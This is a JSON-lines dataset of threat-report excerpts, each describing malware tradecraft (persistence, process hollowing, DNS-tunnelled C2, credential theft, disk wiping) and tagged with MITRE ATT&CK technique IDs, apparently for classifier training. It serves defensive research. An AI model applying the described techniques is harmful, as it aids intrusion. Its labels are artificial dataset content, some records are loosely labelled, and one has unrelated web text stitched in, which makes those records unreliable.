{"text1":"In between then and now there has been a lot of rumour and debate about all aspects of this attack with many truths and mistruths being carried in public. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862\/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Clear all system event logs. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim\u2019s machine by taking advantage of the vulnerability. The number of computers we have observed being attacked or have been attacked is low as borne out by our field detection statistics. The use of browsers other than Internet Explorer by an increasingly large number of people may have helped limit the \u201cattack surface\u201d by reducing the number of computers vulnerable to the Internet Explorer vulnerability used in this attack. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites. Potential attack scenario: When using this vulnerability the most likely attack vector used in this case is targeted emails containing legitimate looking PDF documents sent to high level employees","labels":"['T1070.001']"}
{"text1":"It runs the ipconfig command to gather information about the machine's network adapter configuration. It sends an HTTP POST request to the URL: hxxp:\/\/zeplin.atwebpages.com\/inter.php and exfiltrates the ipconfig output gathered from the\u00a0machine","labels":"['T1016']"}
{"text1":"We identified a MacOS backdoor (detected by Trend Micro as OSX_OCEANLOTUS.D) that we believe is the latest version of a threat used by OceanLotus (a.k.a. The attackers behind OSX_OCEANLOTUS.D target MacOS computers which have the Perl programming language installed","labels":"['T1082']"}
{"text1":"The use of large size files to avoid detection by security solutions with hardcoded size limits for \u2018efficiency\u2019. - A fishing-with-dynamite approach to collecting initial access to victims with low-cost tooling","labels":"['T1027.001']"}
{"text1":"In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. This tool was originally intended to aid defenders in simulating obfuscated PowerShell commands to better their defenses. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails. This PE was slightly different from the other attack, being compiled using the Microsoft .NET Framework instead of being generated via a bat2exe tool and containing a decoy dialog box as shown in Figure 1","labels":"['T1027']"}
{"text1":"The initial infection occurs via a weaponized Microsoft Excel (XLS) document delivered via compromised legitimate websites for which the URLs are most likely shared via email. The documents use Visual Basic for Applications (VBA) Macro code which, if enabled by the victim, starts an installation process consisting of multiple components that result in the plug-in loader payload being downloaded and executed","labels":"['T1204.001', 'T1059.005']"}
{"text1":"Aria-body starts with gathering data on the victim\u2019s machine, including: Host-name, computer-name, username, domain name, windows version, processor ~MHz, MachineGuid, 64bit or not, and public IP (using checkip.amazonaws.com","labels":"['T1016', 'T1082']"}
{"text1":"yty\u201d, the name we use for the framework, from the PDB path string. A \u201cbot id\u201d consisting of computer name, user name, and volume serial number separated by dashes","labels":"['T1082']"}
{"text1":"Once Shellex is called, it first passes each of the items in the config buffer to their own strings. Next, it creates a mutex using the filename and checks to see if the Service key for the service name exists. If so, it opens it using service manager. If not, it first saves a copy of itself to %Program Files (x86)%\/DIFXE\/svchost.exe. Next, it creates the service and runs it","labels":"['T1012', 'T1569.002']"}
{"text1":"The wiper could be configured to use a file to overwrite the files on the disk using the \u2018F\u2019 configuration flag, as we saw images used to overwrite files in previous Shamoon attacks. This file would be stored in a resource named \u2018GRANT\u2019, but this particular wiper is not configured to use a file for overwriting so the GRANT resource does not exist. If it were configured to use a file, this sample would extract the file using the information listed in Table 5","labels":"['T1561.002']"}
{"text1":"This single hack of Volusion allows them to receive credit card data from 3,126 online shops. From the previous skimming attack on the British Airways and Newegg websites, we know that Group 6 tried to register the domains of the exfiltration server to be similar to the victims\u2019 domains. In this case, the domain of the exfiltration server is \u201cvolusion-cdn[.]com\u201d \u2014 very similar to the valid domain \u201ccdn3[.]volusion[.]com\u201d from Volusion. Both old and current skimmers are written with jQuery, serialize the stolen data, and use the jQuery.ajax function to POST data to a remote server. Although the older skimmer is much simpler compared to the current one, it didn\u2019t encode the stolen data or store the data in sessionStorage before the exfiltration","labels":"['T1048.003']"}
{"text1":"The string is visible within the unpacked Karagany binary and is not itself encrypted. Once the payload has been AES-encrypted, it is prepended with the IV value and Base64-encoded for transmission. Figures 4 and 5 show an example decode and decryption based on sinkhole data obtained by CTU researchers of a Karagany beacon payload","labels":"['T1027']"}
{"text1":"After setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex. This registry key is empty upon the first execution of the payload. This exception invokes the exception handler containing the HTTP communication code, allowing it to run. If either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie. If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail","labels":"['T1070.004']"}
{"text1":"If none of the C2 servers respond and the end of the configured hosts list is reached, the modulo operation returns zero, thus host_index is equal to zero and the backdoor waits for the number of milliseconds stored in the <TimeLong> registry key. In our case, this was set to one minute. Then, it starts again and tries to reach the configured C2 servers, again host-by-host, until one response. If a connection to one of the configured C2 servers was set up successfully, the backdoor stays in the inner while loop (C2 control loop) and checks for commands every <TimeShort> number of milliseconds. C2_GetCommand_ComHandler handles the communication with the C2 server. It leverages the Windows WinHttp API similar to this Microsoft example and receives the C2 command along with its parameters. The adversaries use SSL\/TLS to encrypt the C2 traffic","labels":"['T1029']"}
{"text1":"In the instances we have observed, the threat actor sent spear-phishing emails, luring the victims to open a malicious Microsoft Excel\/Word document. The Word droppers were using standard VBA macros to download the payload. The actor tailored the decoy contents to the targeted victims, using logos and themes relevant to the targeted company or using trending topics from their region and, in one instance, even mimicking the Palestinian authority","labels":"['T1082', 'T1566.001']"}
{"text1":"m\": mode:\u00a0net\u00a0or\u00a0local. local\u00a0- encrypt local drives only and ignore network shares. h\": path to a file that contains specific hosts (names and IPs) to enumerate for shares. s\": IP address that the initial register message will be sent to","labels":"['T1016']"}
{"text1":"FIN7 developed evasive techniques at a rapid pace. Throughout 2017, FIN7 was observed creating novel obfuscation methods, and in some cases modifying the methods on a daily basis while launching attacks targeting multiple victims. Their development of a payload obfuscation style using the Windows command interpreter's (cmd.exe) native string substitution was so unique that FireEye dubbed it \"FINcoding. These methods inspired deep command line obfuscation research and the release of Daniel Bohannon's Invoke-DOSfuscation. Reference Table 2 and Table 3 for a selection of samples and their associated command line obfuscation techniques","labels":"['T1059.003']"}
{"text1":"The kill_unwanted function gets a list of running processes, compares each process with a encrypted list of \u201cunwanted\u201d programs. With our aforementioned breakpoint on the ei_str function, we can dump the decrypted strings, to ascertain the value of the \u201cunwanted\u201d programs","labels":"['T1057', 'T1562.001', 'T1518.001']"}
{"text1":"Charming Kitten has taken full advantage of this timing to execute its new campaign to maximum effect. Details Of The Attacks . Our examination of the acquired samples shows hackers generally use two main methods of \u201cSending Fake SMS\u201d and \u201cSending Fake Emails\u201d to execute their attacks. They send confirmation messages stating \u2018Google Account Recovery\u2019 to their targets; they claim these messages are sent by Google and the user must follow the link in the SMS to confirm the identity. Method #2: Fake Email . Another method used in this phishing campaign is sending fake emails with deceptive titles like \u201cMerry Christmas, and sending note\/book\/photo and others\u201d, which are usually sent by previously hacked emails. Figure 2 shows one of these phishing emails where the attackers cordially invite the target to open the link in the email\u2019s body. For example, Figure 3 shows another fake email that was sent to the same victim a day after the initial email (Figure 2). Figure 3. A sample of fake email after sending the initial email to the target . Redirect Chain . Utilizing and weaponizing legal and credible services to hide destructive intent is one of the techniques used by hackers in some phishing campaigns. Redirection links initially help bypass the security layers in email services, and then provide the attackers more control to redirect the target to the final URL. As usual, we firmly suggest not to click on unknown links, to carefully review any URLs before entering credential information, and not to download and run unknown files on mobile, personal or work computers. It is important to note that the main cases mentioned in this report relate to the latest Charming Kitten\u2019s phishing campaign and that this campaign has significantly intensified in recent days","labels":"['T1566.002']"}
{"text1":"The payload is a 32-bit executable file that is used to encrypt files on the victim\u2019s system to extort a ransom","labels":"['T1083']"}
{"text1":"SpeakUp\u2019s persistence is ensured by using cron and an internal mutex to ensure only one instance remains alive at all times","labels":"['T1053.003']"}
{"text1":"In January, we saw a variant of the disk-wiping KillDisk malware hitting several financial institutions in Latin America. Last May, we uncovered a master boot record (MBR)-wiping malware in the same region","labels":"['T1561.002']"}
{"text1":"To make detection and analysis harder, QakBot encrypts its strings and decrypts them at runtime before use. Once the QakBot execution logic is finished using a string, it will immediately delete the string from memory. An example of this can be seen in Figure 6 below, which shows QakBot decrypting a string containing the value for lpProcName passed as a parameter to the GetProcAddress API call. The selected function, which has been labeled in IDA Pro as, \u201coc_clear_mem\u201d deletes the string memory right after it retrieves the process address","labels":"['T1106']"}
{"text1":"The SombRAT loader recovered in this incident was a 64-bit variant that allowed the malicious actor to remotely download and load executable dynamic-link libraries (DLL) plugins on the affected system (Ingress Tool Transfer [T1105]). The loader used hardcoded public RSA keys for command and control (C2) sessions (Command and Control [TA0011]). The C2 communications were encrypted using Advanced Encryption Standard (AES), resulting in a Secure Sockets Layer tunnel with the threat actors (Encrypted Channel: Asymmetric Cryptography [T1573.002","labels":"['T1027']"}
{"text1":"They routinely used standard tools that would mimic legitimate administrator activities. They relied on encrypted SSH-based tunnels to transfer tools and for remote command\/program execution. They routinely deleted dropped attack tools, execution logs, files staged for exfiltration, and other files after they were finished with them. They renamed their tools' filenames in the staging folder so that it would not be possible to identify the malware's purpose, even after it was deleted from the disk through the residual artifacts (e.g. ShimCache entries or WMI Recently Used Apps). - They used timestomping to modify the $STANDARD_INFORMATION attribute of the attack tools","labels":"['T1021.004']"}
{"text1":"Consistent with the perceived goal of credential harvesting, the threat actors dropped and executed open source and free tools such as Hydra, SecretsDump, and CrackMapExec. Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system","labels":"['T1110.002']"}
{"text1":"The files are extracted to a newly created folder with a randomized name under the same path, and the zip file is then deleted. The \u201cAJWrDz.exe\u201d executable path is written to the registry Run key \u201cHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\u201d to achieve persistency","labels":"['T1547.001']"}
{"text1":"KillDisk\u2019s infection chain . How is it dropped in the system. This KillDisk variant looks like it is intentionally dropped by another process\/attacker. The new KillDisk variant\u2019s parameter to shut down the affected machine . KillDisk also has a self-destruct process, although it isn\u2019t really deleting itself. Code snippets showing how KillDisk overwrites then deletes files . How does it wipe the disk. It reads the Master Boot Record (MBR) of every device it successfully opens and proceeds to overwrite the first 0x20 sectors of the device with \u201c0x00\u201d. It uses the information from the MBR to do further damage to the partitions it lists. KillDisk has a numeric parameter that denotes the number of minutes (15 being the default) it will wait before it shuts down the affected machine. To try to reboot the machine, it will try to terminate these processes: This is done most likely to force a reboot or dupe the user into restarting the machine. Additionally, the website utilizes an AI-based application that runs in the background and optimizes its accessibility level constantly. Vision Impaired Profile: this profile adjusts the website so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. Accept Cancel Continue Processing the data, please give it a few seconds","labels":"['T1134']"}
{"text1":"Bisonal used multiple lure documents to entice their victims to open and then be infected with Bisonal malware. Finally, in 2018, Ahnlab released a paper about \"Operation Bitter Biscuit\" where Bisonal was used against Korean and Japanese entities. This is an application document that has been used to provide a decoy to the Bisonal malware. The attacker also implemented a new order: execution of a command by using named pipe to get the output of the executed command. This mechanism allows the malware to execute API functions without ever using the Call instruction, making it difficult to perform the analysis. So that it ensures the thread has a chance to run, it will return the API call sleep() no matter what was originally requested. Office Extension . In 2019, the actor behind Bisonal used a new way to deploy the machine on the target's systems. The purpose of the malware is to deploy Bisonal on the infected system ($tmp$\\tmplogon.exe) and to create a Run registry key in order to execute Bisonal at the next reboot of the system. The attacker implements indirect API calls by using GetProcAddress() and LoadLibrary() API. Even if Bisonal could be considered as simple with less than 30 functions, it has spent its life targeting sensitive entities in both the public and private sectors","labels":"['T1082']"}
{"text1":"NetPass.exe: a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. WebBrowserPassView: a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. Mail PassView: a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo. Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet then writes the service component on the system, which writes Emotet onto the disk","labels":"['T1552.001']"}
{"text1":"The shellcode invokes PowerShell to issue a HTTP GET request for a random four (4) character URI on the root of autodiscovery[.]2bunny[.]com. The requests contain minimal HTTP headers since the PowerShell command is executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload, with minimal HTTP headers","labels":"['T1071.001']"}
{"text1":"The biggest change is the network communication with the C2 server. The malware does not use a raw socket anymore but all the communications are performed with WinInet. The malware performs connection to the C2 server by using InternetOpenA() with an hardcoded User-Agent: \"Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322\". Note the missing parenthesis at the end of the User-Agent. This variant has exactly the same features as the previous variant: file listing, OS version getting, process killing, drive listing, execution via ShellExecuteW(), execution via named pipe, cleaning, file removal, file downloading. On the left a sample from Bisonal 2014 and on the right Bisonal 2011","labels":"['T1095']"}
{"text1":"We have seen Grandoreiro use DGA functions to generate a connection to a Google Sites page storing C2 information","labels":"['T1102.001']"}
{"text1":"When the .lnk file is initialized, it spawns a CMD process. This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw","labels":"['T1059.003']"}
{"text1":"Due to its complex infection process that relies in part on registry updates with malware code, Valak can easily infect an unprotected Windows host. With ADS used to hide follow-up malware from a Valak infection, the risk is greatly increased","labels":"['T1012']"}
{"text1":"SchTasks.exe performs operations similar to those in Scheduled Tasks in Control Panel. You can use either tool to create, delete, configure, or display scheduled tasks. The user must be a member of the Administrators group on the computer that the command affects. To verify that a scheduled task ran or to find out why a scheduled task did not run, see the Task Scheduler service transaction log, Systemroot\\SchedLgU.txt. This log records attempted runs initiated by all tools that use the service, including Scheduled Tasks and SchTasks.exe. On rare occasions, task files become corrupted. Corrupted tasks do not run. When you try to perform an operation on corrupted tasks, SchTasks.exe displays the following error message: ERROR: The data is invalid. You cannot recover corrupted tasks. To restore the task scheduling features of the system, use SchTasks.exe or Scheduled Tasks to delete the tasks from the system and reschedule them","labels":"['T1053.005']"}
{"text1":"The OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the same organization within a six minutes time span. The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time","labels":"['T1566.002']"}
{"text1":"SMOKEDHAM created a persistence mechanism for NGROK by adding VirtualHost.vbs to the WindNT value under the current users Run registry key","labels":"['T1547.001']"}
{"text1":"The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. This was probably done to avoid them being written to the file system","labels":"['T1016', 'T1570']"}
{"text1":"Talos has identified two different infection vectors associated with this particular campaign. In order to compromise their victims, the threat actors sent the trojanized Microsoft Word documents, probably via email. The first vector relies on a trojanized document that fetches a remote template and then uses a known exploit. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. Once the luncher.doc was downloaded, it used CVE-2017-11882, to execute code on the victim's machine","labels":"['T1566.001']"}
{"text1":"The usage of VMProtected binaries is another very common TTP that we\u2019ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit","labels":"['T1027']"}
{"text1":"This script\u00a0is meant to delete the Pony Loader after execution (works in a loop, in order to wait for the sample to terminate).\u00a0The same can be found in Pony 1.9 code","labels":"['T1059.003', 'T1070.004']"}
{"text1":"Recently, a newer version was found in-the-wild, abusing NTFS Alternate Data Streams (ADS) in order to store the content of malicious payloads downloaded during execution. The main vector used by the group is sending malicious files in compressed format, attached to email. File types vary from VBS to LNK; the most recent campaign started to attach an HTML file which executes Javascript for downloading a malicious file","labels":"['T1204.002', 'T1059.005', 'T1564.004']"}
{"text1":"An appetite for stolen code-signing certificates Suckfly has a number of hacktools and malware varieties at its disposal. Figure 1 identifies the malware and tools based on functionality and the number of signed files with unique hashes associated with them","labels":"['T1553.002']"}
{"text1":"In recent weeks, TA551 has changed traffic patterns. 19, 2020, URLs generated by Word macros to retrieve installer binaries followed a noticeable pattern","labels":"['T1105']"}
{"text1":"The attack starts with a malicious XLS attachment, sent in a phishing email, containing an obfuscated macro that downloads a heavily packed second-stage downloader. The second stage fetches the encrypted third-stage, which includes three layered encrypted Lokibot. After a privilege escalation, the third stage deploys Lokibot","labels":"['T1566.001']"}
{"text1":"Naming conventions designed to blend into normal operations (e.g. amsc.exe, msvsvr.dll, alg.exe) - Dropping implants in folders named for legitimate software (e.g","labels":"['T1036.004', 'T1036.005', 'T1036.004']"}
{"text1":"The password-protected ZIP attachments contain a Microsoft Word document with macros to install malware. See Appendix A for examples of these Word documents from June 2020. Prior to April 2020, the most common malware caused by Word documents associated with Shathak\/TA551 was Ursnif. Since April 2020, the most common malware distributed by these Word documents has been Valak. Appendix C lists a series of Valak DLL examples from June 2020","labels":"['T1204.002']"}
{"text1":"The first lateral movement occurred to the domain controller not affected by the use of CVE-2020-1472. An executable was transferred to it via SMB using a domain administrator account","labels":"['T1569.002']"}
{"text1":"It is worth noting at this point that the C2 IP address associated with the cosecman[]com domain appeared to selectively block one of our exit IPs during our research","labels":"['T1016']"}
{"text1":"The tools uploaded to the webshells range from legitimate applications such as cURL to post-exploitation tools such as Mimikatz. We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda","labels":"['T1588.002', 'T1027', 'T1046']"}
{"text1":"It is classified by NTT as a variant of the infamous TrickBot malware, which uses DNS tunneling to stealthily communicate with C2 servers. Though this variant was first discovered in October 2019, there is evidence that Anchor_DNS was used as far back as March 2019","labels":"['T1071.004']"}
{"text1":"Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. This campaign targets organizations in South Asia. ObliqueRAT has been linked to the Transparent Tribe APT group in the past. This campaign hides the ObliqueRAT payload in seemingly benign image files hosted on compromised websites","labels":"['T1204.001', 'T1204.002']"}
{"text1":"This is used to maintain access to a Meterpreter session. It is saved to C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msupdateconf.exe, granting the executable persistence. Another custom executable used to execute PowerShell scripts. The Mosquito JScript backdoor that uses Google Apps Script as its C&C server. Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8","labels":"['T1102.002']"}
{"text1":"REvil sends the encrypted stat data containing the host profile and malware information to the C2 URL via the HTTP POST method. Detection of the associated network traffic is challenging because REvil uses the HTTPS protocol, which encrypts the network communication. The malware reads the subsequent C2 server response but implements no logic to act on the received data. Finally, REvil terminates execution","labels":"['T1041']"}
{"text1":"It will then jump to code that decrypts the Lokibot executable using decryption keys from the configuration structure. The first two layers are decrypted using `DecryptionKeyA` and `DecryptionKeyB`, and reverses all the data. After that, the final layer is decrypted using the same decryption method used to decrypt resource data at the start of the third stage.The DLL contains multiple ways to execute a PE file. The shellcode will create a suspended process using the third parameter as a command line command and injects Lokibot into it using process hollowing","labels":"['T1055.012']"}
{"text1":"DEATHRANSOM is written in C while the other two families are written in C++. DEATHRANSOM uses a distinct series of do\/while loops to enumerate through network resources, logical drives, and directories","labels":"['T1082']"}
{"text1":"Taking advantage of the unprotected open Docker API port, the attackers are able to instantiate an Ubuntu container with the following entry point","labels":"['T1609']"}
{"text1":"1) NetPass.exe is a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. 3) WebBrowserPassView is a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. 4) Mail PassView is a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo. Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet writes the service component on the system, which writes Emotet onto the disk. Emotet\u2019s access to SMB can result in the infection of entire domains (servers and clients","labels":"['T1552.001']"}
{"text1":"Collect information about each disk, including directory and file lists, disk names, total space, and remaining space","labels":"['T1082']"}
{"text1":"For the first time, the ROKRAT sample used during the \"North Korean Human Rights\" contained a browser credentials stealer. For Chrome and Firefox, the malware queries the sqlite database containing the URL, username and password: Additionally, they support the Microsoft Vault mechanism. Vault was implemented in Windows 7, it contains any sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs: On the left, we have the ROKRAT sample and on the right the FreeMilk sample","labels":"['T1555.004']"}
{"text1":"This exception invokes the exception handler containing the HTTP communication code, allowing it to run. If either attempt is successful, the C2 server will respond with the session ID and a pre-shared key in cleartext, which it will save to the previously mentioned registry key. The C2 server will provide the pre-shared key within the response data and will provide the session ID value via the Set-Cookie field within the response, specifically the string after the PHPSESSID parameter of the cookie. If both attempts fail and the payload is unable to obtain a session ID and pre-shared key via HTTP or HTTPS, it will try to use DNS tunneling. random number between 100000 and 999999>.<c2 name> This request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake. The script will first attempt to communicate with the C2 server using HTTPS (HTTP if unsuccessful), which involves GET requests using the session ID within the request's cookie in the PHPSESSID field, as seen in the example GET request","labels":"['T1027']"}
{"text1":"Cobalt Strike appears to be one of BRONZE PRESIDENT's preferred remote access tools. During one intrusion, the threat actors installed it on over 70% of accessible hosts. The group's Cobalt Strike installation typically uses a payload named svchost.exe in an attempt to disguise Cobalt Strike activity as the legitimate Windows svchost.exe executable. BRONZE PRESIDENT installs PlugX using DLL side-loading. In June and August 2019, BRONZE PRESIDENT delivered PlugX via government and law enforcement-themed phishing lures. RCSession \u2014 This basic RAT is installed via DLL side-loading, and CTU researchers observed BRONZE PRESIDENT installing it on multiple hosts during intrusions. RCSession was extracted from a file called English.rtf and launched via a hollowed svchost.exe process. RCSession connects to its C2 server via a custom protocol, can remotely execute commands, and can launch additional tools. CTU researchers have no evidence of other threat actors using RCSession or of wide proliferation of the tool, suggesting it may be exclusively used by BRONZE PRESIDENT. Nbtscan being used via RCSession to scan an internal IP range","labels":"['T1574.002']"}
{"text1":"Let's use the example data 8,54351-1616479009,0 from a beacon sent from the payload to the C2, which it will encode using base64 to OCw1NDM1MS0xNjE2NDc5MDA5LDA=, append the @ symbol and embed within a BMP image. The 8-bits of this base2 representation are then used to set specific bits within the 3-bytes for each pixel","labels":"['T1027.003']"}
{"text1":"After all of the data is gathered, the malware starts communication with the C&C server by periodically sending HTTP POST requests to the following URL on the received domain","labels":"['T1041']"}
{"text1":"CTU researchers observed WCry variants demanding Bitcoin payments equivalent to $300 and $600. The Bitcoin address is provided in the c.wnry configuration file and can vary across samples. If no configuration file is present, the malware uses a hard-coded Bitcoin address. CTU researchers have identified the following Bitcoin addresses associated with the WCry ransomware","labels":"['T1486']"}
{"text1":"The first evidence of its intrusion dated from May 6, 2015 but activity appeared to have begun in earnest on May 12. The attackers appeared to be interested in one division of the ministry that is responsible for relations with the Asia-Pacific region. They attempted to extract all Word documents stored on a file server belonging to this division by bundling them into a RAR archive by running the following command","labels":"['T1039', 'T1083']"}
{"text1":"Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware has evolved over time","labels":"['T1082']"}
{"text1":"While historically TA416 has delivered Zip files from cloud hosting providers containing a decoy file, legitimate PE file, a DLL loader, and a PlugX malware configuration DAT file, recent campaigns used a different tactic. Proofpoint researchers noted that the malicious Zip files delivered from DropBox now contain a rudimentary executable which is a dropper malware. This malware establishes persistence for a legitimate executable file used in DLL search order hijacking, as well as initiates the download of four components. These components are included below and resemble the components used in the past to install PlugX malware. Public research has previously documented TA416\u2019s propensity for including PlugX Trident Loader components and decoy in the initial delivered Zip file. The method of installing PlugX via DLL Search Order hijacking that displays a PDF decoy remains constant","labels":"['T1105']"}
{"text1":"uid= and writes a JSS Loader binary to %TEMP%\\PaintHelper.exe. JSS Loader, which has both .NET and C++ versions, has multiple capabilities, including the ability to load additional executables, PowerShell (PS) and JavaScript (JS) files","labels":"['T1059.007', 'T1105', 'T1059.001']"}
{"text1":"The actor behind Bisonal is clearly motivated and has an interest in Russian, Korean and Japanese victims. The development of Bisonal has been active for more than a decade. However, specific functions are still used today, many years after the original implementation of the Bional malware. Even if Bisonal could be considered as simple with less than 30 functions, it has spent its life targeting sensitive entities in both the public and private sectors. For example, in one campaign they put the domain name of the C2 server in plaintext in the malware which had the function to generate a non-ASCII string for the C2 servers once decoded. In this condition, the malware cannot work on the compromised system. With this investigation and the analysis of this decade of activity, we hope to force this actor to innovate by providing a better understanding of his arsenal and more specifically how Bisonal works","labels":"['T1140']"}
{"text1":"Figure 5: Registry Activity The script then determines the version of Powershell that is being used on the infected system. This is essentially the WMI equivalent of a registry-based run key from a persistence perspective. The Stage 3 malware is by default set to run 'onidle' after 30 minutes","labels":"['T1012']"}
{"text1":"TA505 briefly distributed the Kegotip information stealer in April 2017. Across two campaigns of several million messages each, the actor used both macro-laden Microsoft Word documents and zipped VBScript attachments to install the Trojan on potential victim PCs. Kegotip is an infostealer (credentials and email addresses) used to facilitate other crimeware activities. It steals credentials from various FTP clients, Outlook, and Internet Explorer. It also will gather email addresses scraped from files stored on the computer. This information can be used to facilitate future spam campaigns by the perpetrator or may be sold to other actors","labels":"['T1555.003', 'T1552.001']"}
{"text1":"Note: see the appendix for a list of the domains, file names, and malware MD5 hash values used to facilitate this activity","labels":"['T1027.003']"}
{"text1":"Register as a startup program in HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run if it has no privileged (Figure 6). Otherwise, it will register itself as a system service (Figure 7","labels":"['T1543.003']"}
{"text1":"The two resources that contain commands that ISMInjector uses for persistence are named \u201cTsk1\u201d and \u201cTsk2\u201d. The specific commands within each of these resources are within Table 1. At a high level, the\u201cTsk1\u201d command creates a scheduled task named \u201cReportHealth\u201d that is meant to run a payload saved to \"%localappdata%\\srvHealth.exe\u201d every 4 minutes. The \u201cTsk2\u201d command creates a scheduled task that runs every 2 minutes that is responsible for saving the payload to srvHealth.exe. This task saves the payload to this location using the \u201ccertutil\u201d command to decode the original payload saved to \u201csrvBS.txt","labels":"['T1053.005', 'T1140']"}
{"text1":"Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. The next-stage malware can best be described as a malicious file corrupter","labels":"['T1105']"}
{"text1":"PLEAD also dabbled with a short-lived, fileless version of their malware when it obtained an exploit for a Flash vulnerability (CVE-2015-5119) that was leaked during the Hacking Team breach","labels":"['T1203']"}
{"text1":"This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap","labels":"['T1027', 'T1106']"}
{"text1":"APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we\u00a0published\u00a0a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199","labels":"['T1059.003', 'T1059.003']"}
{"text1":"The Cannon Trojan is written in C# and functions primarily as a downloader that relies on emails to communicate between the Trojan and the C2 server. To communicate with the C2 server, the Trojan will send emails to specific email addresses via SMTPS over TCP port 587","labels":"['T1041']"}
